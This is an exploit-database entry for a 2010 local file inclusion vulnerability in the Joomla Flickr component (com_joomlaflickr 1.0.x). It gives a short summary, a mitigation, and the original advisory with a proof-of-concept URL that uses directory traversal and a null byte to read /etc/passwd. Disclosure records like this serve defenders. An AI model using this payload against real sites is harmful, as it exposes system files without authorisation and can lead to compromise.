header-logo
Suggest Exploit
vendor:
Joomla Component Joomla Flickr
by:
AntiSecurity
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Joomla Component Joomla Flickr
Affected Version From: 1.0.x
Affected Version To: 1.0.x
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Joomla Flickr Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the Joomla Component Joomla Flickr version 1.0.x. An attacker can exploit this vulnerability to include local files on the affected system. This can be exploited to gain access to sensitive information or execute malicious code.

Mitigation:

Update to the latest version of the Joomla Component Joomla Flickr.
Source

Exploit-DB raw data:

==================================================================================================================


  [o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability
 
       Software : com_joomlaflickr version 1.0.x
       Vendor   : http://aloiroberto.wordpress.com/software/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


==================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_joomlaflickr&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00


==================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


==================================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR